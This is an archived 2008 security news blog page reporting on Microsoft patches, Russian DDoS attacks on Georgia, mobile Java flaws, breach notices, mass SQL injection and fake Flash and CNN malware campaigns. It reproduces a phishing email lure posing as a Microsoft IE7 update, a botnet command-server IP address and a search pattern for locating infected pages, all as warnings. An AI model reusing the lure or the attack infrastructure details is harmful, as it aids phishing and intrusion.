CyberInsecure.com

Archive for August, 2008

Microsoft has released six critical patches and five patches described as important, addressing a total of 26 vulnerabilities. All six critical updates address code injection risks involving Access, Excel, Microsoft Office and Internet Explorer.

Full bulletin can be found here. Here’s the brief summary of critical flaws:

CVE-2008-2254, CVE-2008-2255, CVE-2008-2256, CVE-2008-2257, CVE-2008-2259 and CVE-2008-2258: These patches fix IE 5 through 7 on various flavors of Windows and address HTML objects memory corruption vulnerabilities as well as memory corruption issues.

CVE-2008-3004, CVE-2008-3005, CVE-2008-3006, CVE-2008-3003: These patches address four vulnerabilities in Excel that led to remote code executions. An attacker could take advantage of the way Excel processed array indexes, values loaded into memory, records values and connects to third party data.

CVE-2008-0120, CVE-2008-0121 and CVE-2008-1455: Microsoft says: This security update resolves three privately reported vulnerabilities in Microsoft Office PowerPoint and Microsoft Office PowerPoint Viewer that could allow remote code execution if a user opens a specially crafted PowerPoint file. An attacker who successfully exploited any of these vulnerabilities could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Office 2000, 2003 and 2007 are impacted.

CVE-2008-3019, CVE-2008-3018, CVE-2008-3021, CVE-2008-3020, CVE-2008-3460: Microsoft patched vulnerabilities could allow remote code execution if a user viewed a specially crafted image file using Microsoft Office. Office 2000, 2003 and Project 2002 are impacted.

CVE-2008-2245: Microsoft fixed a remote code execution vulnerability in the way that Microsoft Color Management System (MSCMS) module of the Microsoft ICM component handles memory allocation. The vulnerability could allow remote code execution if a user opens a specially crafted image file. Software affected includes Windows 2000, XP, and Server 2003.

CVE-2008-2463: This patch addresses a snapshot viewer arbitrary file download vulnerability in Microsoft Access. It’s an ActiveX control that’s found in Office 2000, XP, Access and Office 2003.

Both servers and (particularly) desktops will need patching to defend against the flaws, which affect the full range of Windows systems and many versions of Office. The total number of vulnerabilities addressed by the patch batch is the highest in two years.

Two of the patches cover vulnerabilities which had already been actively exploited by hackers, according to net security firm McAfee. Opening a rigged image or Office file as well as drive-by download attacks are all possible exploit scenarios for these flaws, which cover bugs in the ActiveX Control of Snapshot Viewer for Microsoft Access and a flaw in Word. Microsoft, for some reason, rates the Word flaw only as “important” rather than critical.

McAfee reckons that updates that fix image processing flaws and a cumulative update for Internet Explorer are also likely targets for attacks and ought to receive prompt triage by sysadmins.

Microsoft originally planned to publish twelve bulletins on Tuesday because of a “last minute quality issue”, a posting on Microsoft’s Security Response Centre Blog explains.

Conflict between Georgia and Russia on the ground has been accompanied by the relaunch of cyber-attacks against Georgian government websites. The Georgian presidential (www.president.gov.ge) and other government websites (such as www.parliament.ge) were left inaccessible by assaults over the weekend, in a repeat of attacks in late July before tensions over the breakaway region of South Ossetia spilled over into armed conflict.

After a week of discussions on Russian Internet forums, a coordinated cyber attack has been launched against Georgia’s Internet infrastructure. The attacks have already managed to compromise several government web sites, with continuing DDoS attacks against numerous other Georgian government sites, forcing the government to switch to hosting locations in U.S: Georgia’s Ministry of Foreign Affairs moved to a Blogspot account.

The DDoS attack appears to be using a Russian malware variant from the Pinch family and a command and control server based in Turkey. Nationalist articles in Russian language papers are apparently inspiring Russia’s digital underground to get involved in assaults on Georgia’s web-facing systems.

Unconfirmed reports claim the notorious RBN (Russian Business Network) are behind the attacks and that Georgian internet servers were owned by foreign attackers on Thursday - the day before Russian tanks rolled into South Ossetia. The peak of DDoS attack and the actual defacements started taking place as of Friday. Several Georgian state computer servers have been under external control since shortly before Russia’s armed intervention into the state commenced on Friday, leaving its online presence in disarray. While the official website of Mikheil Saakashvili, the Georgian President, has become available again, the central government site, as well as the homepages for the Ministry of Foreign Affairs and Ministry of Defence, remain down. Some commercial websites have also been hijacked.

The Georgian Government said that the disruption was caused by attacks carried out by Russia as part of the ongoing conflict between the two states over the Georgian province of South Ossetia. In a statement released via a replacement website built on Google’s blog-hosting service, the Georgian Ministry of Foreign Affairs said that a cyber warfare campaign by Russia is seriously disrupting many Georgian websites, including that of the Ministry of Foreign Affairs.

The DDoS attacks are so sustained that Georgian President’s web site has recently moved to Atlanta. The original servers located in the country of Georgia were “flooded and blocked by Russians” over the weekend, Nino Doijashvili, chief executive of Atlanta-based hosting company Tulip Systems Inc., said Monday. The Georgian-born Doijashvili happened to be on vacation in Georgia when fighting broke out on Friday. She cold-called the government to offer her help and transferred president.gov.ge and rustavi2.com, the Web site of a prominent Georgian TV station, to her company’s servers Saturday.

More defacements of news sites and popular Georgian portals started taking place as well. Two news websites run by breakaway South Ossetia were hacked on Tuesday morning, officials from the secessionist authorities said. The front page of the website of the news agency, OSinform - osinform.ru - which is run by the breakaway region’s state radio and television station IR - retained the agency’s header and logo, but otherwise the entire page was featuring Alania TV’s website content, including its news and images. Alania TV is supported by the Georgian government, and targets audiences in the breakaway region. Another website of the breakaway region’s radio and television station, osradio.ru, was also hacked. Alania TV has denied any involvement, saying it was itself surprised to see its content on the rival news agency’s website.

Shortly after Civil.ge ran the story, it came under DDoS attack, and just like Georgia’s Ministry of Foreign Affairs it switched to a Blogger account in case the site remained unavailable. Moreover, the Shadowserver posted more details on the command and control servers used in the DDoS attacks:

With the recent events in Georgia, we are now seeing new attacks against .ge sites. www.parliament.ge & president.gov.ge are currently being hit with http floods. In this case, the C&C server involved is at IP address 79.135.167.22 which is located in Turkey. We are also observing this C&C as directing attacks against www.skandaly .ru. Traffic from your network to this IP or domain name of googlecomaolcomyahoocomaboutcom .net may indicate compromise and participation in these attacks.

Interests in cyber attacks as an adjunct to real-world conflict has increased since the denial of service attacks took out the internet infrastructure of Estonia in April last year. The attacks coincided with a dispute of the relocation of WWII-era monuments and affected Estonian parliament, bank, newspaper and government sites.

The assaults were blamed on Russian nationalists. Estonian Foreign Minister Urmas Paet suggested that the Kremlin may have had a hand in the attacks but no hard evidence has emerged to substantiate this accusation. Only one person, a locally-resident ethnic Russian, was convicted over the attacks.

An independent security research firm has announced several new mobile Java(J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine(JVM) on mobile phones and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones and only run J2ME MIDlets.

The security research company has produced a 170+ page report on the vulnerabilities and a number of proof of concept(PoC) exploits. Usually when a researcher develops PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000(about $30,000) for early access to the research and malware. Generally after the release of vulnerability information, attackers will attempt to write exploits.

The reported vulnerabilities and exploits in the JVM could allow the running of untrusted Java MIDlets. After using those vulnerabilities, relatively recent phones running S40, 3rd edition are open to malicious MIDlets that exploit the others.

According to the researchers the vulnerabilities allow:

gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level

running a malicious MIDlet when the phone is first turned on

accessing files

sending SMS/MMS

making phone calls

reading your contacts

accessing the SIM card

eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesber which just cause premium rate charges. This is the first time that such phones have been vulnerable to more malicious malware.

According to iPhone hacker Jonathan Zdziarski, Apple has prepared a blacklisting system which allows the company to remotely disable applications on any iPhone device. Apparently, the new 2.x firmware contains a URL which points to a page containing a list of “unauthorized” apps, a move which suggests that the device makes occasional contact with Apple’s servers to see if anything is incorrect on your phone.

Jonathan says that this suggests that the iPhone calls home once in a while to find out what applications it should turn off. At the moment, no apps have been blacklisted, but by all appearances, this has been added to disable applications that the user has already downloaded and paid for, if Apple so chooses to shut them down. It has been discovered this doing a forensic examination of an iPhone 3G. It appears to be tucked away in a configuration file deep inside CoreLocation.

If Apple is indeed monitoring iPhones or plans to remotely scan it for “unauthorized” applications, it indicates a problem deeper than a company who just wants it’s software to be signed and certified. Even on platforms like Symbian, which calls for apps to be signed and traceable, the suggestion that a process of the OS would actively monitor, report on, and possibly deactivate your device’s software is unreasonable, and clearly presents an issue that the company will have to deal with sooner or later.

Another round of fake “authority” email has been launched, this time it is a bogus Internet Explorer 7 (IE7) update spam. Here is a current version of the email (it will probably change a bit soon):

From: admin@microsoft.com

Subject: Internet Explorer 7

Message: You are receiving this e-mail because you subscribed to MSN Featured Offers. Microsoft respects your privacy. If you do not wish to receive this MSN Featured Offers e-mail, please click the “Unsubscribe” link below. This will not unsubscribe you from e-mail communications from third-party advertisers that may appear in MSN Feature Offers. This shall not constitute an offer by MSN. MSN shall not be responsible or liable for the advertisers’ content nor any of the goods or service advertised. Prices and item availability subject to change without notice.

File name in attachment: update.exe

Obviously, Microsoft will not be responsible as its not an update and its not from them. The responsible one, as usual, is the user who clicks links in emails from unknown senders or without verifying the authenticity. If you run any anti-virus product, you are most likely protected, since according to VirusTotal, 33 out of 36 anti-virus vendors detect this malware.

A researcher specializing in website security, Robert Hansen, CEO of secTheory, has strongly criticized safety on Google, arguing the world’s biggest search engine needlessly puts its millions of users at risk. According to him, Google is and will be and always has been vulnerable. “They haven’t been open with consumers. Ultimately, this all comes down the the fact that they just want to track you guys”, he said at Defcon security conference in Las Vegas.

It seems that the problem is Google’s hosting of untested third-party applications that users can automatically embed into personalized Google home pages. During a talk titled “Xploiting Google Gadgets: Gmalware & Beyond,” Hansen and fellow researcher Tom Stracener laid out a variety of attacks that can be unleashed using the programs.

The most serious is the ability of Google gadgets to immediately redirect victims who log into iGoogle.com to a page under the control of an attacker. This creates a phishing hazard, particularly for less tech-savvy users who don’t know to check the browser bar. Even if they do, the bar shows up at gmodules.com, an address many mistakenly believe is safe because it is maintained by Google.

Google gadgets make other attacks possible, including the ability to:

carry out port scanning on a victim’s internal network to conduct surveillance

use cross-site request forgery techniques to force victim PCs to follow links to malicious sites (for instance, those that host child pornography)

cause a victim’s browser to access a home router and change domain name system server addresses or other sensitive settings.

Hansen and Stracener acknowledged that in-the-wild attacks that use Google gadgets are rare, but they said that’s likely to change. “Once money actually starts flowing through, once the financial incentive for malware exists, then you’re going to start seeing more of this type of thing pop up,” Stracener said.

According to Google security engineers, the redirection was a feature rather than a flaw. Google regularly scans gadgets for malicious code, and in the “very rare” occasions bad applications are found, they are immediately quarantined.

The speakers took strong exception to Google’s claim. They’ve had several proof-of-concept gadgets hosted for months on Google, and so far they’ve never been removed, they said.

It is important to remember that users must manually add potentially dangerous objects into their Google homepage, or else they can’t be attacked. Since there wasn’t an attack until now, it seems that it might require a lot of effort finding and attacking users who actually use Google homepage, and change it regularly enough, and download untested third-party applications, and don’t use anti-virus.

According to New Hampshire State Attorney General breach notification, a significant number of unauthorized transactions had been made using Well Fargo’s access codes.

Wells Fargo Bank, N.A. has been advised by a reseller of consumer data, including consumer credit bureau data, of suspicious transactions made using Wells Fargo access codes. The investigation confirmed that a significant number of unauthorized transactions had been made. At this time, Well Fargo does not know how their codes were compromised.

The information currently available indicates that personal information including name, address, and date of birth, social security number, and driver’s license number and, in some cases, credit account information was accessed by an unauthorized person or persons. About 7,000 individuals are affected by this incident.

Well Fargo have notified the United States Secret Service and it is investigating this matter. At this time they have already mailed about 2,410 of their clients and currently attempting to find usable addresses to warn the remaining affected individuals.

Well Fargo have arranged a free one-year membership to Identity Guard CreditProtectX3 for affected clients. To sign up for this service at no cost, one of the following actions should be taken by September 15, 2008: visit www.identityguard.com/alert or call 1-866-271-9434.

For questions, call 1-866-716-9460, beginning Friday, August 1, 2008. Phone Bankers are available to assist you Tuesday through Friday 9:00am and 6:00pm, Pacific Time.

A new round of SQL injection attacks (most likely by Asprox) has infected millions of web pages belonging to businesses and government agencies, including those that belong to the National Institutes of Health and Education Department in the US and the UK Trade & Investment. It seems that a lot of domains involved are still (or again) active, typically using fast flux. The script that is being injected tends to be ngg.js, fgg.js, b.js or js.js. This links to an IP address that is still active.

Simple Google search shows at least 1,470,000 infected pages, some from US and UK government websites that have been hit by the attack. The attack is rather popular and not hard to perform, something that is worrying to know about government-run websites. About 591,000 or so are infected with b.js which seems to point to inactive domains so these are unlikely to do damage. The rest is a mixture of active and inactive links.

A quick breakdown by SANS shows the numbers of infected sites:

.gov - 238
.gov.au - 927
.gov.uk - 2,930
.gov.cn - 34,000
.gov.za - 424
.gov.br - 263
.com - 474,000
.org - 79,900
.com,au - 19,500
.co.uk - 19,300
.ca - 13,100

The high number of infected sites points to a couple of issues. First, sites are compromised and nobody notices, and second, sites that are infected are not cleaned up. To check your own website, do the following Google search replacing domain.com with your own website domain. If this search returns results, you have to clean your website, since it infects it`s visitors:

site:domain.com “script src=http://*/”"ngg.js”|”js.js”|”b.js”

SQL injections take advantage of web developers who write applications that accept user-supplied data without inspecting it for malicious characters. The input is usually entered into search boxes or other fields that interact with the site’s SQL database. Commands in the entered data instruct the website to add links that redirect visitors to websites under the control of attackers.

Websense has discovered that another CNET Networks site, CNET Clientside Developer Blog, has been compromised, just 5 months after previous incident. The main page of this website contains malicious JavaScript code that de-obfuscates into an iframe that loads its primary malicious payload from a different host. This malicious JavaScript code attempts to access the live exploit URL from a .info domain that is now down.

The malicious code is observed to exploit a known integer overflow vulnerability in Adobe Flash (CVE-2007-0071). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction.

The Clientside developer blog which has been embedded with a malicious JavaScript code attempting to exploit the visitors through a well known vulnerability in Adobe Flash’s player. Software vulnerable to this attack includes Adobe Flash Player version 9.0.115.0 and previous, Adobe Flex 3.0, Adobe AIR 1.0.

This malware attack is not as an isolated event. Lately, the attack where legitimate sites are starting to serve malware and exploits became very popular. Multiple vendors are confirming this trend: in its latest report, ScanSafe found 407 percent increase in compromise of legitimate websites, according to Sophos 79 percent of malware-hosting Web sites are legitimate ones, according to Websense more than 75 percent of the Web sites classified as malicious were actually legitimate ones. Those studies show that the old security advise “stay away from unknown websites” would soon become irrelevant.

Known social engineering tactic involving Adobe Flash Player is exploited in currently active malware campaign. Spammed user is encouraged to click on a site with a fake news item in order to install a fake Flash player update (file names might be flashupdate.exe, get_flash_update.exe, watchmovie.mpg.exe). If user clicks “Cancel” in the dialog that prompts for an update, another pop-up appears, that tells the victim that they have to download it to view the video. Clicking “Cancel” there returns the user to the first dialog. It puts the user in perpetual loop, so the only options are to kill the browser session or install the malware. Last night this campaign sent over 80 million messages for the past 24 hours, with 5 million sent on an hourly basis, according to MX Logic.

This campaign is using Fake CNN News Update spam, with subjects like “CNN.com Daily Top 10″. This new CNN tactic is likely to be more successful than the single-line spam tactic that we had been seeing over the past several weeks as this message looks like it could be an news update email sent by CNN. This new message also attempts to trick the user into believing that they signed up to receive it because of their email preference settings at the CNN web site. If you see this message come into your inbox, delete it immediately.

Thousands of legitimate hacked websites and purposely registered for abuse domains are currently participating, with the malware authors continuing to use retro client-side exploits like those detected by ThreatFire’s assessment at the end of July. Users susceptible to any of these news topics might not even get the chance to deny the download attempt of the infected binary. Exploits involved in these attacks include:

Old MS06-014 MDAC Vulnerability

New Microsoft Office Snapshot Viewer ActiveX control vulnerability

One year old Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow

One year old stack overflow in GomManager

Recent RealPlayer.Console heap vulnerability

Two years old WebViewFolderIcon.setSlice integer overflow vulnerability

Rogue media codecs started getting replaced by fake Windows Media Players and other legitimate players, since today’s fake applets impersonating legitimate software. Instead of trying to build trust into an unknown brand, criminals are impersonating and abusing known brands and their software, which increases the probability of someone clicking on it.

This abuse is serious enough to make Adobe issue a Security Bulletin that is warning of malware spreading via a fraudulent Flash Player installer. Adobe warns that worms are making fraudulent posts on social networking sites. These posts include links that lead to fake sites, just like the email spammed ones, that prompt users to update their versions of Flash Player. If users attempt to use the installer to make the update, malware may be downloaded and installed onto their systems.

Update (August 13): Another round of malware spam has been launched, this time featuring MSNBC instead of CNN:

Subject: MSNBC Breaking News

Title: msnbc.com - BREAKING NEWS: <some bogus news here>

If you see this message in your inbox, delete it immediately.